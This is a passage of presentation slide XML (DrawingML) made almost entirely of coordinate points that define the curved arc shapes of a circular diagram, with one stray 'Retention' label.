                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2673299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="226898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2896476" y="1447927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887141" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="703783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844317" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887141" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1447927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363836" y="5138673"/>
            <a:ext cx="12896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Retention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519477" y="3773601"/>
            <a:ext cx="2896870" cy="2943225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="274002" y="703783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="237934" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1447927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237934" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52158" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="703783"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1146873" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100023" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053960" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008735" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964399" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920965" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878497" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837018" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796582" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718972" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681888" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645985" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611327" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577951" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545884" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515175" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485863" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457974" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431571" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406679" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383349" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361607" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341503" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323075" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306349" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291388" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266890" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223710" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234315" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246646" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260667" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276326" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293598" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312445" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332828" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354736" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378104" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402907" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429120" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456704" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485622" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515835" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547306" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580009" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613918" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648970" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685165" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722439" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760768" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840460" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881748" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923950" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967041" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010983" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055725" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101255" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147521" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="226898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1147521" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101255" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055725" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010983" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967041" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923950" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881748" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840460" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760768" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722439" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685165" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648970" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613918" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580009" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547306" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515835" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485622" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456704" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429120" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402907" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378104" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354736" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332828" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312445" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293598" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276326" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260667" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246646" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234315" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223710" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266890" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291388" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306349" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323075" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341503" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361607" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383349" y="894029"/>
                </a:lnTo>
                <a:lnTo>
